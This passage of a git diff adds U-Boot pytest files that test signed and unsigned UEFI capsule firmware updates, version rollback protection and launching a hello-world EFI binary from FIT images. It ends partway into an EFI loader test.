+            # make sure the dfu_alt_info exists because it is required for making ESRT.
+            output = u_boot_console.run_command_list([
+                'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;'
+                'u-boot-env raw 0x150000 0x200000"',
+                'efidebug capsule esrt'])
+
+            if capsule_auth:
+                # capsule authentication failed
+                verify_content(u_boot_console, '100000', 'u-boot:Old')
+                verify_content(u_boot_console, '150000', 'u-boot-env:Old')
+            else:
+                # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT.
+                assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output)
+                assert 'ESRT: fw_version=5' in ''.join(output)
+                assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output)
+
+                # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT.
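+                # fw_version=10 comes from the capsule itself (Test102 is
+                # built with fw-version <0xa>), while
+                # lowest_supported_fw_version=7 comes from the version.dts
+                # overlay merged into test_ver.dtb.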
+                assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output)
+                assert 'ESRT: fw_version=10' in ''.join(output)
+                assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output)
+
+                verify_content(u_boot_console, '100000', 'u-boot:New')
+                verify_content(u_boot_console, '150000', 'u-boot-env:New')
+
+    def test_efi_capsule_fw5(
+            self, u_boot_config, u_boot_console, efi_capsule_data):
+        """ Test Case 5
+        Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version
+        but fw_version is lower than lowest_supported_version
+        No update should happen
+        0x100000-0x150000: U-Boot binary (but dummy)
+        """
+        disk_img = efi_capsule_data
+        capsule_files = ['Test103']
+        with u_boot_console.log.section('Test Case 5-a, before reboot'):
+            capsule_setup(u_boot_console, disk_img, '0x0000000000000004')
+            init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old')
+            place_capsule_file(u_boot_console, capsule_files)
+
+        # reboot
+        do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb')
+
+        capsule_early = u_boot_config.buildconfig.get(
+            'config_efi_capsule_on_disk_early')
+        with u_boot_console.log.section('Test Case 5-b, after reboot'):
+            if not capsule_early:
+                exec_manual_update(u_boot_console, disk_img, capsule_files)
+
+            check_file_removed(u_boot_console, disk_img, capsule_files)
+
+            verify_content(u_boot_console, '100000', 'u-boot:Old')
diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py
new file mode 100644
index 00000000000..44a58baa310
--- /dev/null
+++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py
@@ -0,0 +1,193 @@
+# SPDX-License-Identifier: GPL-2.0+
+# Copyright (c) 2021, Linaro Limited
+# Copyright (c) 2022, Arm Limited
+# Author: AKASHI Takahiro <takahiro.akashi@linaro.org>,
+# adapted to FIT images by Vincent Stehlé <vincent.stehle@arm.com>
+
+"""U-Boot UEFI: Firmware Update (Signed capsule with FIT images) Test
+This test verifies capsule-on-disk firmware update
+with signed capsule files containing FIT images
+"""
+
+import pytest
+from capsule_common import (
+    capsule_setup,
+    init_content,
+    place_capsule_file,
+    exec_manual_update,
+    check_file_removed,
+    verify_content,
+    do_reboot_dtb_specified
+)
+
+@pytest.mark.boardspec('sandbox_flattree')
+@pytest.mark.buildconfigspec('efi_capsule_firmware_fit')
+@pytest.mark.buildconfigspec('efi_capsule_authenticate')
+@pytest.mark.buildconfigspec('dfu')
+@pytest.mark.buildconfigspec('dfu_sf')
+@pytest.mark.buildconfigspec('cmd_efidebug')
+@pytest.mark.buildconfigspec('cmd_fat')
+@pytest.mark.buildconfigspec('cmd_memory')
+@pytest.mark.buildconfigspec('cmd_nvedit_efi')
+@pytest.mark.buildconfigspec('cmd_sf')
+@pytest.mark.slow
+class TestEfiCapsuleFirmwareSignedFit():
+    """Capsule-on-disk firmware update test
+    """
+
+    def test_efi_capsule_auth1(
+            self, u_boot_config, u_boot_console, efi_capsule_data):
+        """Test Case 1
+        Update U-Boot on SPI Flash, FIT image format
+        0x100000-0x150000: U-Boot binary (but dummy)
+
+        If the capsule is properly signed, the authentication
+        should pass and the firmware be updated.
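+        Test13 carries a FIT payload signed with the valid test key pair
+        (CAPSULE_PRIV_KEY/CAPSULE_PUB_KEY in capsule_gen_binman.dts).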
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test13'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test14'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted any way + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 3 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted any way + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. 
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test114'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '3673B45D-6A7C-46F3-9E60-ADABB03F7937' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test115'] + with u_boot_console.log.section('Test Case 5-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py new file mode 100644 index 00000000000..83a10e160b8 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py @@ -0,0 +1,192 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update (Signed capsule with raw images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') 
+@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedRaw(): + """Firmware Update (Signed capsule with raw images) Test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 1 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test11'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test12'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 3 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. 
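+        Test02 is an unsigned capsule reused from the plain raw-image tests.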
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test111', 'Test112'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. 
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test113'] + with u_boot_console.log.section('Test Case 5-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/version.dts b/test/py/tests/test_efi_capsule/version.dts new file mode 100644 index 00000000000..07850cc6064 --- /dev/null +++ b/test/py/tests/test_efi_capsule/version.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; +/plugin/; + +&{/} { + firmware-version { + image1 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "09D7CF52-0720-4710-91D1-08469B7FE9C8"; + }; + image2 { + lowest-supported-version = <7>; + image-index = <2>; + image-type-id = "5A7021F5-FEF2-48B4-AABA-832E777418C0"; + }; + image3 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "3673B45D-6A7C-46F3-9E60-ADABB03F7937"; + }; + }; +}; diff --git a/test/py/tests/test_efi_fit.py b/test/py/tests/test_efi_fit.py new file mode 100644 index 00000000000..0ad483500f8 --- /dev/null +++ b/test/py/tests/test_efi_fit.py @@ -0,0 +1,466 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Cristian Ciocaltea <cristian.ciocaltea@gmail.com> +# +# Work based on: +# - test_net.py +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# - test_fit.py +# Copyright (c) 2013, Google Inc. +# +# Test launching UEFI binaries from FIT images. + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +# Additionally, when the 'size' is not available, the file will be generated +# automatically in the TFTP root directory, as specified by the 'dn' field. 
+env__efi_fit_tftp_file = { + 'fn': 'test-efi-fit.img', # File path relative to TFTP root + 'size': 3831, # File size + 'crc32': '9fa3f79c', # Checksum using CRC-32 algorithm, optional + 'addr': 0x40400000, # Loading address, integer, optional + 'dn': 'tftp/root/dir', # TFTP root directory path, optional +} +""" + +import os.path +import pytest +import u_boot_utils as util + +# Define the parametrized ITS data to be used for FIT images generation. +ITS_DATA = ''' +/dts-v1/; + +/ { + description = "EFI image with FDT blob"; + #address-cells = <1>; + + images { + efi { + description = "Test EFI"; + data = /incbin/("%(efi-bin)s"); + type = "%(kernel-type)s"; + arch = "%(sys-arch)s"; + os = "efi"; + compression = "%(efi-comp)s"; + load = <0x0>; + entry = <0x0>; + }; + fdt { + description = "Test FDT"; + data = /incbin/("%(fdt-bin)s"); + type = "flat_dt"; + arch = "%(sys-arch)s"; + compression = "%(fdt-comp)s"; + }; + }; + + configurations { + default = "config-efi-fdt"; + config-efi-fdt { + description = "EFI FIT w/ FDT"; + kernel = "efi"; + fdt = "fdt"; + }; + config-efi-nofdt { + description = "EFI FIT w/o FDT"; + kernel = "efi"; + }; + }; +}; +''' + +# Define the parametrized FDT data to be used for DTB images generation. +FDT_DATA = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + model = "%(sys-arch)s %(fdt_type)s EFI FIT Boot Test"; + compatible = "%(sys-arch)s"; + + reset@0 { + compatible = "%(sys-arch)s,reset"; + reg = <0 4>; + }; +}; +''' + +@pytest.mark.buildconfigspec('bootm_efi') +@pytest.mark.buildconfigspec('cmd_bootefi_hello_compile') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +@pytest.mark.requiredtool('dtc') +def test_efi_fit_launch(u_boot_console): + """Test handling of UEFI binaries inside FIT images. + + The tests are trying to launch U-Boot's helloworld.efi embedded into + FIT images, in uncompressed or gzip compressed format. + + Additionally, a sample FDT blob is created and embedded into the above + mentioned FIT images, in uncompressed or gzip compressed format. + + For more details, see launch_efi(). + + The following test cases are currently defined and enabled: + - Launch uncompressed FIT EFI & internal FDT + - Launch uncompressed FIT EFI & FIT FDT + - Launch compressed FIT EFI & internal FDT + - Launch compressed FIT EFI & FIT FDT + """ + + def net_pre_commands(): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment + at the beginning of this file. + """ + + init_usb = cons.config.env.get('env__net_uses_usb', False) + if init_usb: + cons.run_command('usb start') + + init_pci = cons.config.env.get('env__net_uses_pci', False) + if init_pci: + cons.run_command('pci enum') + + def net_dhcp(): + """Execute the dhcp command. + + The boardenv_* file may be used to enable/disable DHCP; see the + comment at the beginning of this file. + """ + + has_dhcp = cons.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + cons.log.warning('CONFIG_CMD_DHCP != y: Skipping DHCP network setup') + return False + + test_dhcp = cons.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + cons.log.info('No DHCP server available') + return False + + cons.run_command('setenv autoload no') + output = cons.run_command('dhcp') + assert 'DHCP client bound to address ' in output + return True + + def net_setup_static(): + """Set up a static IP configuration. 
+ + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + has_dhcp = cons.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + cons.log.warning('CONFIG_NET != y: Skipping static network setup') + return False + + env_vars = cons.config.env.get('env__net_static_env_vars', None) + if not env_vars: + cons.log.info('No static network configuration is defined') + return False + + for (var, val) in env_vars: + cons.run_command('setenv %s %s' % (var, val)) + return True + + def make_fpath(file_name): + """Compute the path of a given (temporary) file. + + Args: + file_name -- The name of a file within U-Boot build dir. + Return: + The computed file path. + """ + + return os.path.join(cons.config.build_dir, file_name) + + def make_efi(fname, comp): + """Create an UEFI binary. + + This simply copies lib/efi_loader/helloworld.efi into U-Boot + build dir and, optionally, compresses the file using gzip. + + Args: + fname -- The target file name within U-Boot build dir. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + bin_path = make_fpath(fname) + util.run_and_log(cons, + ['cp', make_fpath('lib/efi_loader/helloworld.efi'), + bin_path]) + if comp: + util.run_and_log(cons, ['gzip', '-f', bin_path]) + bin_path += '.gz' + return bin_path + + def make_dtb(fdt_type, comp): + """Create a sample DTB file. + + Creates a DTS file and compiles it to a DTB. + + Args: + fdt_type -- The type of the FDT, i.e. internal, user. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + # Generate resources referenced by FDT. + fdt_params = { + 'sys-arch': sys_arch, + 'fdt_type': fdt_type, + } + + # Generate a test FDT file. + dts = make_fpath('test-efi-fit-%s.dts' % fdt_type) + with open(dts, 'w', encoding='ascii') as file: + file.write(FDT_DATA % fdt_params) + + # Build the test FDT. + dtb = make_fpath('test-efi-fit-%s.dtb' % fdt_type) + util.run_and_log(cons, ['dtc', '-I', 'dts', '-O', 'dtb', '-o', dtb, dts]) + if comp: + util.run_and_log(cons, ['gzip', '-f', dtb]) + dtb += '.gz' + return dtb + + def make_fit(comp): + """Create a sample FIT image. + + Runs 'mkimage' to create a FIT image within U-Boot build dir. + Args: + comp -- Enable gzip compression for the EFI binary and FDT blob. + Return: + The path of the created file. + """ + + # Generate resources referenced by ITS. + its_params = { + 'sys-arch': sys_arch, + 'efi-bin': os.path.basename(make_efi('test-efi-fit-helloworld.efi', comp)), + 'kernel-type': 'kernel' if comp else 'kernel_noload', + 'efi-comp': 'gzip' if comp else 'none', + 'fdt-bin': os.path.basename(make_dtb('user', comp)), + 'fdt-comp': 'gzip' if comp else 'none', + } + + # Generate a test ITS file. + its_path = make_fpath('test-efi-fit-helloworld.its') + with open(its_path, 'w', encoding='ascii') as file: + file.write(ITS_DATA % its_params) + + # Build the test ITS. + fit_path = make_fpath('test-efi-fit-helloworld.fit') + util.run_and_log( + cons, [make_fpath('tools/mkimage'), '-f', its_path, fit_path]) + return fit_path + + def load_fit_from_host(fit): + """Load the FIT image using the 'host load' command and return its address. + + Args: + fit -- Dictionary describing the FIT image to load, see + env__efi_fit_test_file in the comment at the beginning of + this file. + Return: + The address where the file has been loaded. 
+ """ + + addr = fit.get('addr', None) + if not addr: + addr = util.find_ram_base(cons) + + output = cons.run_command( + 'host load hostfs - %x %s/%s' % (addr, fit['dn'], fit['fn'])) + expected_text = ' bytes read' + size = fit.get('size', None) + if size: + expected_text = '%d' % size + expected_text + assert expected_text in output + + return addr + + def load_fit_from_tftp(fit): + """Load the FIT image using the tftpboot command and return its address. + + The file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + Args: + fit -- Dictionary describing the FIT image to load, see env__efi_fit_tftp_file + in the comment at the beginning of this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = util.find_ram_base(cons) + + file_name = fit['fn'] + output = cons.run_command('tftpboot %x %s' % (addr, file_name)) + expected_text = 'Bytes transferred = ' + size = fit.get('size', None) + if size: + expected_text += '%d' % size + assert expected_text in output + + expected_crc = fit.get('crc32', None) + if not expected_crc: + return addr + + if cons.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = cons.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + + return addr + + def launch_efi(enable_fdt, enable_comp): + """Launch U-Boot's helloworld.efi binary from a FIT image. + + An external image file can be downloaded from TFTP, when related + details are provided by the boardenv_* file; see the comment at the + beginning of this file. + + If the size of the TFTP file is not provided within env__efi_fit_tftp_file, + the test image is generated automatically and placed in the TFTP root + directory specified via the 'dn' field. + + When running the tests on Sandbox, the image file is loaded directly + from the host filesystem. + + Once the load address is available on U-Boot console, the 'bootm' + command is executed for either 'config-efi-fdt' or 'config-efi-nofdt' + FIT configuration, depending on the value of the 'enable_fdt' function + argument. + + Eventually the 'Hello, world' message is expected in the U-Boot console. + + Args: + enable_fdt -- Flag to enable using the FDT blob inside FIT image. + enable_comp -- Flag to enable GZIP compression on EFI and FDT + generated content. + """ + + with cons.log.section('FDT=%s;COMP=%s' % (enable_fdt, enable_comp)): + if is_sandbox: + fit = { + 'dn': cons.config.build_dir, + } + else: + # Init networking. + net_pre_commands() + net_set_up = net_dhcp() + net_set_up = net_setup_static() or net_set_up + if not net_set_up: + pytest.skip('Network not initialized') + + fit = cons.config.env.get('env__efi_fit_tftp_file', None) + if not fit: + pytest.skip('No env__efi_fit_tftp_file binary specified in environment') + + size = fit.get('size', None) + if not size: + if not fit.get('dn', None): + pytest.skip('Neither "size", nor "dn" info provided in env__efi_fit_tftp_file') + + # Create test FIT image. + fit_path = make_fit(enable_comp) + fit['fn'] = os.path.basename(fit_path) + fit['size'] = os.path.getsize(fit_path) + + # Copy image to TFTP root directory. + if fit['dn'] != cons.config.build_dir: + util.run_and_log(cons, ['mv', '-f', fit_path, '%s/' % fit['dn']]) + + # Load FIT image. + addr = load_fit_from_host(fit) if is_sandbox else load_fit_from_tftp(fit) + + # Select boot configuration. + fit_config = 'config-efi-fdt' if enable_fdt else 'config-efi-nofdt' + + # Try booting. 
+ output = cons.run_command('bootm %x#%s' % (addr, fit_config)) + if enable_fdt: + assert 'Booting using the fdt blob' in output + assert 'Hello, world' in output + assert '## Application failed' not in output + cons.restart_uboot() + + cons = u_boot_console + # Array slice removes leading/trailing quotes. + sys_arch = cons.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + if sys_arch == 'arm': + arm64 = cons.config.buildconfig.get('config_arm64') + if arm64: + sys_arch = 'arm64' + + is_sandbox = sys_arch == 'sandbox' + + if is_sandbox: + old_dtb = cons.config.dtb + + try: + if is_sandbox: + # Use our own device tree file, will be restored afterwards. + control_dtb = make_dtb('internal', False) + cons.config.dtb = control_dtb + + # Run tests + # - fdt OFF, gzip OFF + launch_efi(False, False) + # - fdt ON, gzip OFF + launch_efi(True, False) + + if is_sandbox: + # - fdt OFF, gzip ON + launch_efi(False, True) + # - fdt ON, gzip ON + launch_efi(True, True) + + finally: + if is_sandbox: + # Go back to the original U-Boot with the correct dtb. + cons.config.dtb = old_dtb + cons.restart_uboot() diff --git a/test/py/tests/test_efi_loader.py b/test/py/tests/test_efi_loader.py new file mode 100644 index 00000000000..85473a9049b --- /dev/null +++ b/test/py/tests/test_efi_loader.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# Copyright (c) 2016, Alexander Graf <agraf@suse.de> +# +# based on test_net.py. + +# Test efi loader implementation + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its 